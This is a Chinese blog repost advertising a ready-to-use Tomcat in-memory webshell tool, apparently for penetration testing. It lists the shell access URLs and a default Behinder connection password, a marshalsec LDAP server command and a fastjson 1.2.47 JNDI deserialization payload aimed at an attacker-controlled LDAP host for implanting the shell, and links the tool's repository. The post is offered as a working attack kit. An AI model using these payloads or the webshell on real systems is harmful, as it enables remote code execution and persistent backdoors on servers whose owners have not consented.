首页 > 系统相关 >【渗透工具】直接上手就用的内存马(附下载)

【渗透工具】直接上手就用的内存马(附下载)

时间:2024-12-28 21:52:07浏览次数:1  
标签:渗透 com CMD URL xx 内存 上手 冰蝎

一、工具简介

拿来即用的Tomcat7/8/9/10版本Listener/Filter/Servlet内存马,支持注入CMD内存马和冰蝎内存马。

二、使用方法

1、Listener型/Filter型:

CMD内存马URL:xx.xx.xx.xx/?chan=whoami
冰蝎内存马URL:xx.xx.xx.xx/     默认连接密码:goautomne

2、Servlet型:

CMD内存马URL: xx.xx.xx.xx/p?chan=whoami
冰蝎内存马URL: xx.xx.xx.xx/p     默认连接密码:goautomne

三、利用举例

以fastjson1.2.47版本的反序列化漏洞为例,将对应Tomcat版本的class文件,这里以ILRain.class为例,上传到web服务器,并开启LDAP服务

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://xx.xx.xx.xx/#ILRain 9102

然后再打入fastjson漏洞的poc,就可以使用冰蝎客户端去连接了

{
    "a":{
        "@type":"java.lang.Class",
        "val":"com.sun.rowset.JdbcRowSetImpl"
    },
    "b":{
        "@type":"com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName":"ldap://xx.xx.xx.xx:9102/123",
        "autoCommit":true
    }
}

四、项目地址

https://github.com/ce-automne/TomcatMemShell

原创 系统安全运维

标签:渗透,com,CMD,URL,xx,内存,上手,冰蝎
From: https://www.cnblogs.com/o-O-oO/p/18638018

相关文章

  • vs code 环境配置(小白快速上手版)
    目录一,vscode介绍二,下载vscode三,安装实用小插件四,VSCode配置五,在电脑上运行JavaScript语言的后端框架:Node.js 一,vscode介绍VisualStudioCode(VSCode)是一个功能强大的代码编辑器,它在HTML学习中的重要性体现在以下几个方面:1.轻量级编辑器:VSCode轻量......
  • JS渗透逆向入门
    在做爬虫登录和渗透测试挖洞JS逆向的时候,除了一些简单的爬取或者传参,不需要设置太过复杂的参数构造,但是大多数情况下一些网站的用户名或者密码都会在前端进行一次加密,然后传输到后端进行登录,这时候我们可以选择对前端页面登录方式进行逆向分析。注意:本篇文章主要是讲解在登录......
  • C++大内存分配错误
    支持一对一答疑的购买网址C++无法分配大内存当影像较大时,m和n是int类型时,char*a=newchar[m*n]可能出现无法分配内存的错误原因分析:由于早期数据处理需求对内存需要较小,例如早期影像较小,影像长宽的积较小,char*a=newchar[m*n]不会出错。时代变化,影像体积变大,老代码仍旧使......
  • JVM 主要组成部分与内存区域
    一、JVM主要组成部分:JVM的主要包含两个组件和两个子系统,分别为:(1)本地库接口(NativeInterface):与nativelib(本地方法库)交互,融合其他编程语言为Java所用,是与其它编程语言交互的接口(2)运行时数据区(Runtimedataarea():即常说的JVM内存(3)类加载子系统(Classloader):根据全限......
  • [VUE]CALL_AND_RETRY_LAST分配失败-JavaScript堆内存不足 errno134
    使用vscode开发项目,由于项目较大,在运行npmrundev命令后,在一定的时间范围内,对vscode中的代码进行保存后,会自动编译运行,保存几次后就报错,需要重新运行npmrundev,很耗费时间)后报错报错:CALL_AND_RETRY_LASTAllocationfailed-JavaScriptheapoutofmemory(CALL_AND_RETRY_LAS......
  • 【安全工具】Cobalt Strike使用教程:内网渗透之信息收集篇
    一、前言二、内网信息收集篇2.1判断是否存在域2.2域内存活主机探测2.3域内基础信息收集2.4域内控制器的查找2.5定位域管理员工具2.5.1通过psloggedon.exe2.5.2通过PVEFindADUser.exe2.5.3通过PowerSploit的PowerVi......
  • lin.security提权靶场渗透
    声明!学习视频来自B站up主**泷羽sec**有兴趣的师傅可以关注一下,如涉及侵权马上删除文章,笔记只是方便各位师傅的学习和探讨,文章所提到的网站以及内容,只做学习交流,其他均与本人以及泷羽sec团队无关,切勿触碰法律底线,否则后果自负!!!!有兴趣的小伙伴可以点击下面连接进入b站主页[B......
  • JVM实战—JVM内存设置与对象分配流转
    1.JVM内存划分的原理细节(1)背景引入接下来介绍JVM内存的分代模型:新生代、老年代、永久代。现在已知代码里创建的对象,都会进入到Java堆内存中。如下所示,main()方法会周期性执行loadReplicasFromDisk()方法来加载副本数据。publicclassKafka{publicstaticvoidm......
  • 2025年CXL强势启航:开启内存扩展新时代
    ComputeExpressLink(CXL)是一项旨在提高数据中心和高性能计算环境中CPU、内存及加速器之间通信效率的技术。尽管自2019年以来就已经存在并开始被一些产品使用,但直到2025年,CXL才有望从一个非常小众的技术转变为常规技术,广泛应用于现代服务器中。CXL相关扩展阅读:CXL与近......
  • 智能问答模型升级,通义灵码新增图片多模态问答模式等新能力,项目秒上手
    通义灵码智能问答模型升级Qwen2.5Coder、输入交互升级并丰富上下文支持,全新支持多模态图片问答模式等。1.智能问答模型升级到最新Qwen2.5Coder智能问答升级到最新Qwen2.5Coder模型,编程性能和效率均实现大幅提升,其旗舰代码模型在十余项基准评测中均取得开源最佳成绩,成为......